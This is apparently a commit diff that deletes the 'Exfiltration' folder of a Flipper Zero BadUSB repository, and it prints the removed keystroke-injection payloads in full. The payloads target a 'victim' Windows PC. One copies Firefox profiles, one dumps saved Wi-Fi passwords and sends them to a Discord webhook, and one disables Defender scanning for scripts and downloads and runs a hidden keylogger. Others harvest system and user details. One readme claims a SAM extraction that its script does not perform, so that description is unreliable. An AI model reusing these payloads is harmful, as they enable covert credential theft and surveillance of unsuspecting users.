STRLCPY/UNC0V3R3D_FlipperZero-BadUSB

■ ■ ■ ■ ■ ■

Exfiltration/ExfilFirefox/ExfilFirefox.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Exfiltrate Firefox profile and store to path. Change destination Path at the very end of the string.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 750
6	-	WINDOWS d
7	-	DELAY 1500
8	-	WINDOWS r
9	-	DELAY 1500
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 750
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 1200
16	-	ALT y
17	-	DELAY 1200
18	-	GUI UP
19	-	DELAY 1200
20	-	STRING $ErrorActionPreference = "SilentlyContinue";$folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-26528702.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$fireSaveDir = New-Item $userDir'\WGD\FireFox-Profile' -ItemType Directory;$fireDir = (Get-ChildItem env:userprofile).value + '\AppData\Roaming\Mozilla\Firefox\Profiles';Copy-Item $fireDir -Destination $fireSaveDir -Recurse;Start-Sleep -s 10;$Report >> $fileSaveDir'/ComputerInfo-26528702.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-26528702.zip ; exit
21	-	ENTER
22	-

■ ■ ■ ■ ■ ■

Exfiltration/ExfilFirefox/readme.md

1	-
2	-	# ExfilFirefox
3	-	This script exfiltrates the firefox profile and saves them to a local html file.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change path of the file "-DestinationPath PATH\results-26528702.zip"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- copy firefox profile
16	-	- paste profile into a html file
17	-
18	-
19	-
20	-	## Feedback
21	-
22	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
23	-
24	-
25	-
26	-
27	-
28	-
29	-	## Support
30	-
31	-	For support, contact me via Discord "UNC0V3R3D#8662".
32	-
33	-
34	-	## Meta
35	-
36	-
37	-	- If you want to sponsor me on Patreon, the link is on my profile.
38	-
39	-
40	-

■ ■ ■ ■ ■ ■

Exfiltration/General_PC_Information/General_PC_Information.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Saves some general Information about the target pc to a file.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 750
6	-	WINDOWS d
7	-	DELAY 900
8	-	WINDOWS r
9	-	DELAY 900
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 750
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 900
16	-	ALT y
17	-	DELAY 900
18	-	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; $style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>'; $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-34231960.html'; $Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"; $SysBootTime = Get-WmiObject Win32_OperatingSystem; $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)\| ConvertTo-Html datetime; $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME); $SerialNo = $SysSerialNo.SerialNumber; $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 \| Select Manufacturer,Model; $SysManufacturer = $SysInfo.Manufacturer; $SysModel = $SysInfo.Model; $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption; $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"; $HD = [math]::truncate($disk.Size / 1GB); $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB); $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME \| Select TotalVisibleMemorySize; $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB); $SysCpu = Get-WmiObject Win32_Processor \| Select Name; $Cpu = $SysCpu.Name; $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME \| select SerialNumber; $HardSerialNo = $HardSerial.SerialNumber; $SysCdDrive = Get-WmiObject Win32_CDROMDrive \|select Name; $graphicsCard = gwmi win32_VideoController \|select Name; $graphics = $graphicsCard.Name; $SysCdDrive = Get-WmiObject Win32_CDROMDrive \|select -first 1; $DriveLetter = $CDDrive.Drive; $DriveName = $CDDrive.Caption; $Disk = $DriveLetter + '\' + $DriveName; $Firewall = New-Object -com HNetCfg.FwMgr; $FireProfile = $Firewall.LocalPolicy.CurrentProfile; $FireProfile = $FireProfile.FirewallEnabled; $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"; $Report >> $fileSaveDir'/ComputerInfo-34231960.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip ; exit
19	-	ENTER

■ ■ ■ ■ ■ ■

Exfiltration/General_PC_Information/readme.md

1	-
2	-	# General_PC_Information
3	-	This script saves some general info about the pc into a file.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change path of the file "-DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- exfiltrate pc info
16	-	- paste info to a html file
17	-
18	-
19	-
20	-	## Feedback
21	-
22	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
23	-
24	-
25	-
26	-
27	-
28	-
29	-	## Support
30	-
31	-	For support, contact me via Discord "UNC0V3R3D#8662".
32	-
33	-
34	-	## Meta
35	-
36	-
37	-	- If you want to sponsor me on Patreon, the link is on my profile.
38	-
39	-
40	-

■ ■ ■ ■ ■ ■

Exfiltration/GetAllComputerInfo/GetAllComputerInfo.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Simple Powershell script that stores alot of Info about the PC into a file. For more info read the comments (REM) in the code below.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 1000
6	-	GUI r
7	-	DELAY 450
8	-	REM Start Powershell as Admin
9	-	STRING powershell Start-Process powershell -Verb runAs
10	-	DELAY 500
11	-	ENTER
12	-	DELAY 600
13	-	LEFTARROW
14	-	DELAY 600
15	-	ENTER
16	-	DELAY 750
17	-	REM Change the "Path" to your path ("C:\...").
18	-	STRING $Path = "PATH"
19	-	DELAY 500
20	-	ENTER
21	-	DELAY 500
22	-	REM Creates the Results.txt file to the path
23	-	STRING New-Item -Path "$Path\Results.txt" -ItemType File
24	-	DELAY 500
25	-	ENTER
26	-	DELAY 700
27	-	REM Gets all the Info about the PC and stores them into the created Results.txt file
28	-	STRING Get-ComputerInfo \| Out-File -FilePath "$Path\Results.txt"
29	-	DELAY 300
30	-	ENTER

■ ■ ■ ■ ■ ■

Exfiltration/GetAllComputerInfo/readme.md

1	-
2	-	# GetAllComputerInfo
3	-	This script saves almost every valuable info about the pc to a file.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change path of the file "STRING $Path = "PATH""
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- exfiltrate pc info
16	-	- paste info to a html file
17	-
18	-
19	-
20	-	## Feedback
21	-
22	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
23	-
24	-
25	-
26	-
27	-
28	-
29	-	## Support
30	-
31	-	For support, contact me via Discord "UNC0V3R3D#8662".
32	-
33	-
34	-	## Meta
35	-
36	-
37	-	- If you want to sponsor me on Patreon, the link is on my profile.
38	-
39	-
40	-

■ ■ ■ ■ ■ ■

Exfiltration/IP_To_Discord/SaveIP_ToDiscordWebhook.txt

1	-	REM Author: Startrk1995
2	-	REM Description: Saves the IP of the target pc to a discord webhook.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 500
6	-	GUI r
7	-	DELAY 200
8	-	STRING powershell
9	-	ENTER
10	-	DELAY 1000
11	-	STRING $url="DISCORD WEBHOOK LINK";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 \| Select-Object IPAddress,SuffixOrigin \| where IPAddress -notmatch '(127.0.0.1\|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) \| Select-String "\:(.+)$" \| %{$name=$_.Matches.Groups[1].Value.Trim(); $_} \| %{(netsh wlan show profile name="$name" key=clear)} \| Select-String "Key Content\W+\:(.+)$" \| %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} \| %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} \| Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body \| ConvertTo-Json);curl.exe -F "[email protected]" $url ; Remove-Item '.\stats.txt';exit
12	-	ENTER
13	-

■ ■ ■ ■ ■ ■

Exfiltration/IP_To_Discord/readme.md

1	-
2	-	# IP_To_Discord
3	-	Saves the IP of the target pc to a discord webhook.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change the url of the discord webhook "$url="DISCORD WEBHOOK LINK""
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- get ip adress
16	-	- send file with ip to webhook
17	-
18	-
19	-
20	-	## Feedback
21	-
22	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
23	-
24	-
25	-
26	-
27	-
28	-
29	-	## Support
30	-
31	-	For support, contact me via Discord "UNC0V3R3D#8662".
32	-
33	-
34	-	## Meta
35	-
36	-
37	-	- If you want to sponsor me on Patreon, the link is on my profile.
38	-
39	-
40	-

■ ■ ■ ■ ■ ■

Exfiltration/Keylogger/Keylogger.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: This script allows you to inject a software keylogger in victim's PC
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 2500
6	-	GUI d
7	-	DELAY 500
8	-	GUI r
9	-	DELAY 500
10	-	STRING powershell.exe -windowstyle hidden
11	-	DELAY 200
12	-	CTRL SHIFT ENTER
13	-	DELAY 5000
14	-	LEFT
15	-	DELAY 150
16	-	ENTER
17	-	DELAY 5000
18	-	STRING cd C:\Users\Public\Documents
19	-	ENTER
20	-	STRING Add-MpPreference -ExclusionExtension ps1 -Force
21	-	ENTER
22	-	STRING Set-ExecutionPolicy unrestricted -Force
23	-	ENTER
24	-	STRING wget (LINK TO KEYLOGGER) -OutFile script.ps1
25	-	ENTER
26	-	DELAY 3500
27	-	STRING powershell.exe -noexit -windowstyle hidden -file script.ps1
28	-	ENTER
29	-	CAPSLOCK
30	-	DELAY 150
31	-	CAPSLOCK
32	-	DELAY 150
33	-	CAPSLOCK
34	-	DELAY 150
35	-	CAPSLOCK
36	-	DELAY 2000
37	-	CAPSLOCK
38	-	DELAY 150
39	-	CAPSLOCK
40	-	DELAY 150
41	-	CAPSLOCK
42	-	DELAY 150
43	-	CAPSLOCK
44	-	REM End of payload
45	-

■ ■ ■ ■ ■ ■

Exfiltration/Keylogger/readme.md

1	-
2	-	# Keylogger
3	-	This script is only for experienced penetration testers.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change url to a .ps keylogger script "STRING wget (LINK TO KEYLOGGER)"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- download .ps script
16	-	- execute script
17	-
18	-
19	-
20	-	## Feedback
21	-
22	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
23	-
24	-
25	-
26	-
27	-
28	-
29	-	## Support
30	-
31	-	For support, contact me via Discord "UNC0V3R3D#8662".
32	-
33	-
34	-	## Meta
35	-
36	-
37	-	- If you want to sponsor me on Patreon, the link is on my profile.
38	-
39	-
40	-

■ ■ ■ ■ ■ ■

Exfiltration/ListWindowsUpdates/ListWindowsUpdates.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Saves all installed windows updates to a list. Don't forget to change the path.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 750
6	-	WINDOWS d
7	-	DELAY 1500
8	-	WINDOWS r
9	-	DELAY 1500
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 750
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 1200
16	-	ALT y
17	-	DELAY 1200
18	-	GUI UP
19	-	DELAY 1200
20	-	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-90412137.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=center><h3> Installed Updates</h3>';$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME \| sort-object -property installedon -Descending \| ConvertTo-Html Description, HotFixId,Installedon,InstalledBy);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-90412137.html'
21	-	ENTER
22	-	STRING Compress-Archive -Path $fileSaveDir -DestinationPath results-90412137.zip ; exit
23	-	ENTER
24	-

■ ■ ■ ■ ■ ■

Exfiltration/ListWindowsUpdates/readme.md

1	-
2	-	# ListWindowsUpdates
3	-	This script is going to save the names of installed windows updates.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change path for the file "-DestinationPath results-90412137.zip"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- list windows updates
16	-	- store them into a file
17	-
18	-
19	-
20	-	## Feedback
21	-
22	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
23	-
24	-
25	-
26	-
27	-
28	-
29	-	## Support
30	-
31	-	For support, contact me via Discord "UNC0V3R3D#8662".
32	-
33	-
34	-	## Meta
35	-
36	-
37	-	- If you want to sponsor me on Patreon, the link is on my profile.
38	-
39	-
40	-

■ ■ ■ ■ ■ ■

Exfiltration/SAMexfil/SAMexfil.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Extracts Security Account Manager of the PC to a file.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 750
6	-	WINDOWS d
7	-	DELAY 1500
8	-	WINDOWS r
9	-	DELAY 1500
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 750
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 1200
16	-	ALT y
17	-	DELAY 1200
18	-	GUI UP
19	-	DELAY 1200
20	-	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-61748762.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>';$Report = $Report + (GET-WMIOBJECT Win32_Share \| convertto-html Name, Description, Path);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-61748762.html'
21	-	ENTER
22	-	STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-61748762.zip ; exit
23	-	ENTER
24	-

■ ■ ■ ■ ■ ■

Exfiltration/SAMexfil/readme.md

1	-
2	-	# SAMexfil
3	-	This script extracts the Security Account Manager (SAM) of the PC and saves it to a file.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change path for the file "-DestinationPath PATH\results-61748762.zip"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- copy SAM profile
16	-	- store it to a file
17	-
18	-
19	-
20	-	## Feedback
21	-
22	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
23	-
24	-
25	-
26	-
27	-
28	-
29	-	## Support
30	-
31	-	For support, contact me via Discord "UNC0V3R3D#8662".
32	-
33	-
34	-	## Meta
35	-
36	-
37	-	- If you want to sponsor me on Patreon, the link is on my profile.
38	-
39	-
40	-

■ ■ ■ ■ ■ ■

Exfiltration/USB_And_Harddrive_Information/USB_And_Harddrive_Information.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 750
6	-	WINDOWS d
7	-	DELAY 900
8	-	WINDOWS r
9	-	DELAY 900
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 750
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 900
16	-	ALT y
17	-	DELAY 900
18	-	GUI UP
19	-	DELAY 900
20	-	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>';$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-68597243.html';$Report = $Report + '<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>';$u = 0;$allUsb = @(get-wmiobject win32_volume \| select Name, Label, FreeSpace);$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'
21	-	ENTER
22	-	STRING do {
23	-	ENTER
24	-	STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
25	-	ENTER
26	-	STRING $Report = $Report + '<tr><td>Drive Name: </td><td>' + $allUsb[$u].Name + $allUsb[$u].Label + '</td><td>Free Space: </td><td>' + $gbUSB + 'GB</td></tr>'
27	-	ENTER
28	-	STRING Write-Output $fullUSB
29	-	ENTER
30	-	STRING $u ++
31	-	ENTER
32	-	STRING } while ($u -lt $allUsb.Count)
33	-	ENTER
34	-	STRING $Report = $Report + '</table></div>'
35	-	ENTER
36	-	STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html'
37	-	ENTER
38	-	STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit
39	-	ENTER

■ ■ ■ ■ ■ ■

Exfiltration/USB_And_Harddrive_Information/readme.md

1	-
2	-	# USB_And_Harddrive_Information
3	-	Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change the path of the file "-DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- get hardware info
16	-	- save infos to a file
17	-
18	-
19	-	## Feedback
20	-
21	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
22	-
23	-
24	-
25	-
26	-
27	-
28	-	## Support
29	-
30	-	For support, contact me via Discord "UNC0V3R3D#8662".
31	-
32	-
33	-	## Meta
34	-
35	-
36	-	- If you want to sponsor me on Patreon, the link is on my profile.
37	-
38	-
39	-

■ ■ ■ ■ ■ ■

Exfiltration/Win_User_Info/Win_User_Info.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Saves some general Info about the current Win-User.
3	-	REM Version: 1.0
4	-	REM Category: Exfiltration
5	-	DELAY 750
6	-	WINDOWS d
7	-	DELAY 900
8	-	WINDOWS r
9	-	DELAY 900
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 750
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 900
16	-	ALT y
17	-	DELAY 900
18	-	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-57059022.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 \| Where-Object {$_.Name -eq $env:UserName}\| Select AccountType,SID,PasswordRequired;$UserType = $UserInfo.AccountType;$UserSid = $UserInfo.SID;$UserPass = $UserInfo.PasswordRequired;$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator');$Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>";$Report = $Report + "</div>";$Report >> $fileSaveDir'/ComputerInfo-57059022.html'
19	-	ENTER
20	-	STRING Compress-Archive -Path $fileSaveDir -DestinationPath C:\PATH TO SAVE HERE\FILEresults-57059022.zip ; exit
21	-	ENTER

■ ■ ■ ■ ■ ■

Exfiltration/Win_User_Info/readme.md

1	-
2	-	# Win_User_Info
3	-	Saves some general Info about the current Win-User and stores it to a file.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You need to do the following changes:
8	-
9	-	- change the path of the file "C:\PATH TO SAVE HERE\FILEresults-57059022.zip"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- get win user info
16	-	- save info to a file
17	-
18	-
19	-	## Feedback
20	-
21	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
22	-
23	-
24	-
25	-
26	-
27	-
28	-	## Support
29	-
30	-	For support, contact me via Discord "UNC0V3R3D#8662".
31	-
32	-
33	-	## Meta
34	-
35	-
36	-	- If you want to sponsor me on Patreon, the link is on my profile.
37	-
38	-
39	-

Delete Exfiltration directory